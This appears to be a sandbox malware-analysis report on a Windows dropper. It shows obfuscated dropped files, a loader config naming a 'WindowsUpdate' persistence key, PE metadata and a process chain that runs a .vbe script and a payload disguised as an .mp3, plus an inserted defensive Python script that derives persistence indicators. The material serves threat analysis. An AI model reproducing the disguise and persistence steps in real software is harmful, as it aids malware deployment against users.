                                              Preview:..;.$...bp....u.w ..... .kJ....Q]Du.........e..~7....!}{%.9.k.X...j..ke.....J*b.+(<. N-dP1...E7........0............g..p...".l....`..b.|.b....MEZQ....(iyh}...P...?........+..-._k.?..T.....z..'.m.. ....#.c.s.-`.&..V..p...u#.$P....e..DF....W...w.j.O._.-....u= .....IA^.z....sl....&....o....Yp..E....1..2.hd~Bv....{.Xe...n.?.mMp|.c=.....Z}[by..]/..H...K.....k.r....n.3.g.b.6.4.w.B.4.8.0.3.7.X.O.5.n.9.0.i.6.5.g.8.r.2.d.J.2.....l.2.Q.8.l.H.0.L.....,...x.0]t..E.....m...1?h.o..!.>.R..m....X...4C..U..i....p#"....<@....wI.y.^j..}E....:A..X4..{Q...>...I...bI]a ...f..'...%...!.......t.RJm(.o.68.......J~.~o.x/}.E...v.....k.6.B.2.g.L.3.3.1.0.w.o.....X.t.6.Q.V.C.5.4.T.7.2.s.5.r.5.9.v.0.4.H.q.3.z.A.h.r.4.o.2.S.W.G.O.Z.M.5.F.L.e.6.m.K.1.3.N.W.k.8.....j.y.c.P.7.6.6.b.5.9.x.d.0.P.1.k.6.8.f.r.h.v.4.8.t.5.p.L.i.G.3.....m.6.4.W.9.2.....9.8.4.2.X.U.Y.0.5.4.4.2.9.C.5.W.3.U.9.6.2.X.j.e.C.r.Z.1.Y.T.9.3.k.....b.8.4.E.9.e.9......L..b..`..n...zh.jQ.3.^..<bDS.0../5.m..:|..)..Ja.5r.,.../
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):41169
                                              Entropy (8bit):5.574992140650956
                                              Encrypted:false
                                              SSDEEP:768:SqzHu71BxiT+rwNwh5KG/KKQs2TUdeDPz6YzTwnuO+YZk7IZ:NHU1rstNrGiKQRT9DL6DuOP9
                                              MD5:5FE3C2E677E90B8971DCAEC9D9CF973D
                                              SHA1:CCCEFD97B61B17F2BC60983D2437925A7B063B20
                                              SHA-256:762982A2B57B2A93DD63FBF230DA414B6C3ABC6240D4B0AF7BB940DC81B74512
                                              SHA-512:2C204731CC1BDB18259E737CDCE622833367413BF10A75A73E23D3C531E3739093D0E4227C032AAB61EA8F26A8D65175AC3072EAF61116FF07BC623E0D402727
                                              Malicious:false
                                              Preview:Gs8k9G..09Dze2Ri21v07024j3Bkj08k43620w..as6F9u248nt4E5D34X8TicUo56G1p6Iq7HWQ6CO543yP0E..xaJjJ6998evt364K2JMk3JUL1V169d17W1525g8u64Q8mg624Dq69u..RwDHspQjqT7082C211yji23005131f84T0V4Rt783H5qN..71503293t47A3715b4GE0K1n2HSP78l25n49k2qOp668h89L439GV76rXE63A660vI238..VPtgmDkG5IY651h2xX92d3O72m544t7j6KbS3789u3..8juXPy4HfT34a96W79i4L635wQN7C64m0fV5Q6G83u2Dsd..phmvnO5wH7bw707x270573Yr30Iaqb8Z3ornK7..Sk69g85nW3urpi71T05z02880K89onK84T33dy93ziqP..4J937x4E606vqL7fKZg2G8uTA2f20g8z8N7j58097O6w98030D1O8RN9S..Mnh8Sb8x5UW0x4M26I8f394Z8..9A9cur15YeDDM5O8G3A7rDs4949a4k9RYF76v99K..SM6gUf3u8v64W2N889l16N5arA6z268E1Y8T6c8b27d42d29S6i..S8whuJPCVO3N3Fm05JeGtD4M..l1p19Kskx87icmQeA2umK9E66LU8j87e320208152Hk75O7B1OP9UU22..t602Dct2yRctvCMtZyp4kn25XRJ0qH921b0r67t..4940R0K3j25Z941pc385q1bKK31ajV75rr6v905G4b497939SDz6k961po13O70z0..gu0QN79T640hn842q969k980Qe8i3k78137xBT5QI4x94G..u8u2ItTd0afA0F0T8lk38J1Eu5W1867To0PF8V8466vS13..Lc5l4blEH80kJtCcncqb3G3r12116x544DE59gG1Z0gR055nei3um11eU6x48Y..n62F5C0l6GM181230H77R8364N7
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):517
                                              Entropy (8bit):5.60876413392208
                                              Encrypted:false
                                              SSDEEP:12:g3tc6T0er7S8x1pbJ5+HB+PteGsoregI5v:sTNr7S8rpbJdPtWg8v
                                              MD5:4DAA3E600C4D2C162FFE78C5DF68AB8E
                                              SHA1:C1F052EB1577599B89B70AE99BD9E6C8DDE4F822
                                              SHA-256:C2B1869137E2E69E3969C50A0918EB71C5797F84FAF4093AEF0C890957A193EA
                                              SHA-512:35C537693DF896C6B62118BD38BBDC6C0B4233C391FA11FEC0E49373E08E7BAEDC9FAB07489BC9C55D7D69797820AEFC6C21C62B5A8669EE8AEF297DBF89ED6F
                                              Malicious:false
                                              Preview:94fl4Vi93m506967tqUkd2rq80v81m3D5T71v6B8JtB12z46779Q7o7M6EGvF4uJWM5dt4i62H71S43T9575xR5xP644ye..ToolbarConstants ToolbarConstants..59s492Ipmlntg9c0WuAa6yOc2fLAUFHlRtlbYoa..FileConstants ToolbarConstants..863Zy4EYs568DAWVZ2uH3890igu5Y361H1Y8v4o929lSB6556M2yTP3o342t8721N0H6p5nw5959eA2..GuiDateTimePicker StructureConstants..c64xycev244ZQqU4x410L5X6rVO617q4C7z3K7gB5k81h3g4sx2HPo2VDBj113h748313BS7G7jI8bt315ob95142G2g09z0..StructureConstants ToolTipConstants..QV0HiRFd3ZDK9227R86G6WQ..ComboConstants GuiDateTimePicker..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):507
                                              Entropy (8bit):5.6090252322037335
                                              Encrypted:false
                                              SSDEEP:12:B0SXXoGYepQld6qJM7hBfZJyCv6jMJoDbGPWqJ5QEWz:JlYQyd6WM7BJzS4mbtq5uz
                                              MD5:992C91B45A9F3472868D47E61CB8675E
                                              SHA1:FCDFBC8EC428982B4CB0B09FB00244DE0BC78073
                                              SHA-256:A8A5116542D33261544E18C4431C11A45F77AB24A7F06A2C1D06480066EC6E62
                                              SHA-512:24054844512035AB6962F3ABE2DA36D56AC7E182A72A19D8A38F1C356D7BDE30F14FE6FE3EF057C602A73E53A5D9131676C01F1EF99B545877015A4D3243B9EB
                                              Malicious:false
                                              Preview:8u945m2142LJ65a6So7R8t5st6601672XsVFQib88SnLg9143011331K3RuSbm3..GuiDateTimePicker StructureConstants..mSs378DDJFLCg18436734Q4owR926424B2q2EexiB..DateTimeConstants GuiDateTimePicker..9ZD6F6qLj9L01K0Z904p58I62uwhO5xE78414y9z074U1i4TxBRJtk1ak3qC223u0A74u83jKy0t..ToolbarConstants ToolbarConstants..vhhqME9L023D54yNN5374t7676B88B69DrU6uipg1csk9mRX436188452v88a57mqh5Yv930203v1bX00p630uz9NMO0qrg22OfJjm0qX53kIgVl4B343Q4xd7GM8R741352Bxng4HWRbY8r1swz4E5hE74167uHr3R13on315KY89..UpDownConstants DateTimeConstants..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):86
                                              Entropy (8bit):4.972176674810693
                                              Encrypted:false
                                              SSDEEP:3:YRRvufhJ4ENvuAp9JlC9hRGdY66zidsI8y:Av0f9ZoG3648y
                                              MD5:6883F353F1F2DCAAEC509E79B343884A
                                              SHA1:1C14B5DD9B50C493F1B1E47D9797D248909E9892
                                              SHA-256:B97288CD746477E7C09411B8F5182F217DD8A95B4ECDE7DDCB046A5436ED0F56
                                              SHA-512:730DC24F722F73E9449D46272E45DD55863BFF38D3EC947A4E200230D67A7C27F4F643F436827107A3304916D6A5B9F2D7046951A1811873A9E46AB481AFB2FE
                                              Malicious:false
                                              Preview:[S3tt!ng]..stpths=%appdata%..Key=WindowsUpdate..Dir3ctory=wlnk..ExE_c=qwlvpmrupf.mp3..
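The 86-byte `[S3tt!ng]` file above is the loader's install configuration, and the dropped-file records earlier on this page show its effect: the same 947288-byte PE is first written as `C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3` and later runs from `C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe`. The Python below is an added example, not part of the Joe Sandbox report: it parses the settings and predicts the persistence paths so they can be compared with the paths the sandbox actually observed. The meaning given to each key (stpths plus Dir3ctory is the install directory, ExE_c is the payload name with `.exe` appended on copy, Key is the name of an autorun entry) is an inference from this report's dropped-file paths, not something the report states, and `%appdata%` is pinned to the analysis VM's `C:\Users\user\AppData\Roaming` so the code runs offline.

```python
"""Parse the dropped loader settings and derive the persistence artifacts
a responder should hunt for.  Added example, not Joe Sandbox output; the
settings text is the 86-byte file shown in the report (CRLF endings)."""
import ntpath
import re

# Constructed from the report's preview of the dropped settings file.
SETTINGS_TEXT = (
    "[S3tt!ng]\r\n"
    "stpths=%appdata%\r\n"
    "Key=WindowsUpdate\r\n"
    "Dir3ctory=wlnk\r\n"
    "ExE_c=qwlvpmrupf.mp3\r\n"
)

# Environment used for %var% expansion; constructed to match the analysis
# VM paths in the report (user name 'user').
SAMPLE_ENV = {"appdata": r"C:\Users\user\AppData\Roaming"}

# Process paths taken from the report's dropped-file records (constructed list).
OBSERVED_PATHS = [
    r"C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3",
    r"C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe",
]

SECTION_RE = re.compile(r"^\[(?P<name>[^\]]+)\]$")


def parse_settings(text):
    """Return {section: {key: value}} for an INI-style blob.  Keys are kept
    verbatim because the loader leetspeaks them (S3tt!ng, Dir3ctory, ExE_c)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group("name")
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip()] = value.strip()
    return sections


def expand_env(value, env):
    """Expand %NAME% tokens case-insensitively, Windows-style.  An unknown
    name is left in place rather than expanded to an empty string."""
    def repl(m):
        return env.get(m.group(1).lower(), m.group(0))
    return re.sub(r"%([^%]+)%", repl, value)


def persistence_artifacts(text=SETTINGS_TEXT, env=SAMPLE_ENV):
    """Install directory, copied payload path and autorun value name.
    ASSUMPTION (inferred from the report's drop paths, not stated by it):
    stpths + Dir3ctory = install dir, ExE_c gets '.exe' appended when copied,
    Key = autorun entry name."""
    s = parse_settings(text)["S3tt!ng"]
    install_dir = ntpath.join(expand_env(s["stpths"], env), s["Dir3ctory"])
    return {
        "install_dir": install_dir,
        "payload_path": ntpath.join(install_dir, s["ExE_c"] + ".exe"),
        "autorun_name": s["Key"],
    }


def matches_observed(artifacts, observed_paths=OBSERVED_PATHS):
    """True when a predicted payload path was actually seen (NTFS is
    case-insensitive, so compare lower-cased)."""
    want = artifacts["payload_path"].lower()
    return any(p.lower() == want for p in observed_paths)
```

With the report's own process paths as input, the prediction matches the second drop location exactly, which is how a hunt team turns this config into a file-path and autorun-name indicator for other hosts.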
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.890106938142716
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:ngPebbPhbp.exe
                                              File size:1'684'188 bytes
                                              MD5:fa000351e26e17543f67e3dedc97d37e
                                              SHA1:c59fc4f489ac15d5a1d455abbf0c3c5ad6fcc189
                                              SHA256:5f58e87fee021cbaa9ecfae2d5f8709bd0934b2d2d2779a8f24993425fb20350
                                              SHA512:1bf517f2b0d3c156c2850f161f4bedf735361a8951d807b05eeaa711a0720031e545d5dd56f46337f059ef18bea1523ec1f5a5b96e83d6380eb74e6526bd0025
                                              SSDEEP:49152:cpUlRhQMnbfKk8QkwCRYhtkp0d0X1zJ5w+ufya5h:cpUlYEfKk8DTROk6dK1l5wF
                                              TLSH:D4752202BBC48472D5B324310AF58B511A7CB9212F718ACF63D519BD9B71AD2DA31FA3
                                              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v..p2.b#2.b#2.b#.E.#?.b#.E.#..b#.E.#*.b#...#0.b#..f"!.b#..a"*.b#..g"..b#;..#9.b#;..#5.b#2.c#,.b#..g"..b#..b"3.b#...#3.b#..`"3.b
                                              Icon Hash:4f858a8a888ac14f
                                              Entrypoint:0x4265d0
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x6640971F [Sun May 12 10:17:03 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:1
                                              File Version Major:5
                                              File Version Minor:1
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:1
                                              Import Hash:99ee65c2db82c04251a5c24f214c8892
                                              Instruction
                                              call 00007FF4D0D3743Bh
                                              jmp 00007FF4D0D36DBDh
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              push ecx
                                              lea ecx, dword ptr [esp+08h]
                                              sub ecx, eax
                                              and ecx, 0Fh
                                              add eax, ecx
                                              sbb ecx, ecx
                                              or eax, ecx
                                              pop ecx
                                              jmp 00007FF4D0D3646Fh
                                              push ecx
                                              lea ecx, dword ptr [esp+08h]
                                              sub ecx, eax
                                              and ecx, 07h
                                              add eax, ecx
                                              sbb ecx, ecx
                                              or eax, ecx
                                              pop ecx
                                              jmp 00007FF4D0D36459h
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 0Ch
                                              lea ecx, dword ptr [ebp-0Ch]
                                              call 00007FF4D0D29999h
                                              push 0044634Ch
                                              lea eax, dword ptr [ebp-0Ch]
                                              push eax
                                              call 00007FF4D0D37C67h
                                              int3
                                              jmp 00007FF4D0D3D99Eh
                                              int3
                                              int3
                                              push 004293C0h
                                              push dword ptr fs:[00000000h]
                                              mov eax, dword ptr [esp+10h]
                                              mov dword ptr [esp+10h], ebp
                                              lea ebp, dword ptr [esp+10h]
                                              sub esp, eax
                                              push ebx
                                              push esi
                                              push edi
                                              mov eax, dword ptr [00449778h]
                                              xor dword ptr [ebp-04h], eax
                                              xor eax, ebp
                                              push eax
                                              mov dword ptr [ebp-18h], esp
                                              push dword ptr [ebp-08h]
                                              mov eax, dword ptr [ebp-04h]
                                              mov dword ptr [ebp-04h], FFFFFFFEh
                                              mov dword ptr [ebp-08h], eax
                                              lea eax, dword ptr [ebp-10h]
                                              mov dword ptr fs:[00000000h], eax
                                              ret
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              mov ecx, dword ptr [ebp-10h]
                                              mov dword ptr fs:[00000000h], ecx
                                              pop ecx
                                              pop edi
                                              pop edi
                                              pop esi
                                              pop ebx
                                              mov esp, ebp
                                              pop ebp
                                              push ecx
                                              ret
                                              push ebp
                                              mov ebp, esp
                                              Programming Language:
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                               Name | Virtual Address | Virtual Size | Is in Section
                                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x47d70 | 0x34 | .rdata
                                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0x47da4 | 0x50 | .rdata
                                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x58000 | 0x9428 | .rsrc
                                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x62000 | 0x2afc | .reloc
                                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x44580 | 0x54 | .rdata
                                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_TLS | 0x44600 | 0x18 | .rdata
                                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3ec58 | 0x40 | .rdata
                                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_IAT | 0x3c000 | 0x280 | .rdata
                                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x4722c | 0x120 | .rdata
                                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                               Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                               .text | 0x1000 | 0x3a32c | 0x3a400 | e320764e1b3c816ba80aeb820cb8a274 | False | 0.581381605418455 | data | 6.685359764265178 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                               .rdata | 0x3c000 | 0xcbf8 | 0xcc00 | 47c3be3304bfdfb2a778f355849d1c3f | False | 0.4439529718137255 | data | 5.167069652624378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                               .data | 0x49000 | 0xd7e0 | 0x1200 | 6335f9314c2900dccb530e151f1b1ee8 | False | 0.3956163194444444 | data | 4.0290550032041 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                               .didat | 0x57000 | 0x1a8 | 0x200 | 232a8fe82993b55cefe09cffc39a79b0 | False | 0.462890625 | data | 3.5080985761326375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                               .rsrc | 0x58000 | 0x9428 | 0x9600 | 02b344b619e272faf6cb04beedab1a4e | False | 0.7404947916666667 | data | 7.0359500857205655 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                               .reloc | 0x62000 | 0x2afc | 0x2c00 | 98fd4bc572f87a21f69dc57f720a6dbc | False | 0.75 | data | 6.617141671767599 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x58554 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x5909c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x5a648 | 0x475c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.8958287716225093
RT_DIALOG | 0x5eda4 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x5f02c | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x5f168 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x5f254 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x5f384 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x5f6bc | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x5f910 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x5faf4 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x5fcc0 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x5fe78 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x5ffc0 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x6042c | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x60594 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x606e8 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x607f4 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x608b0 | 0x1c0 | data | English | United States | 0.5178571428571429
RT_STRING | 0x60a70 | 0x250 | data | English | United States | 0.44256756756756754
RT_GROUP_ICON | 0x60cc0 | 0x14 | data | | | 1.05
RT_MANIFEST | 0x60cd4 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | LocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA, FindNextFileA
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken | Map
English | United States |

                                              Target ID:0
                                              Start time:07:44:58
                                              Start date:21/11/2024
                                              Path:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\ngPebbPhbp.exe"
                                              Imagebase:0xb00000
                                              File size:1'684'188 bytes
                                              MD5 hash:FA000351E26E17543F67E3DEDC97D37E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:1
                                              Start time:07:45:02
                                              Start date:21/11/2024
                                              Path:C:\Windows\SysWOW64\wscript.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe"
                                              Imagebase:0xa70000
                                              File size:147'456 bytes
                                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:2
                                              Start time:07:45:09
                                              Start date:21/11/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                              Imagebase:0x240000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:07:45:09
                                              Start date:21/11/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:07:45:09
                                              Start date:21/11/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\cmd.exe" /c qwlvpmrupf.mp3 tnlupe.mp3
                                              Imagebase:0x240000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:07:45:10
                                              Start date:21/11/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
                                              Start time:07:45:10
                                              Start date:21/11/2024
                                              Path:C:\Windows\SysWOW64\ipconfig.exe
                                              Wow64 process (32bit):true
                                              Commandline:ipconfig /release
                                              Imagebase:0x940000
                                              File size:29'184 bytes
                                              MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:7
                                              Start time:07:45:10
                                              Start date:21/11/2024
                                              Path:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              Wow64 process (32bit):true
                                              Commandline:qwlvpmrupf.mp3 tnlupe.mp3
                                              Imagebase:0x370000
                                              File size:947'288 bytes
                                              MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 0%, ReversingLabs
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:8
                                              Start time:07:45:13
                                              Start date:21/11/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                              Imagebase:0x240000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:07:45:13
                                              Start date:21/11/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:10
                                              Start time:07:45:13
                                              Start date:21/11/2024
                                              Path:C:\Windows\SysWOW64\ipconfig.exe
                                              Wow64 process (32bit):true
                                              Commandline:ipconfig /renew
                                              Imagebase:0x940000
                                              File size:29'184 bytes
                                              MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:14
                                              Start time:07:45:21
                                              Start date:21/11/2024
                                              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                              Imagebase:0x5c0000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
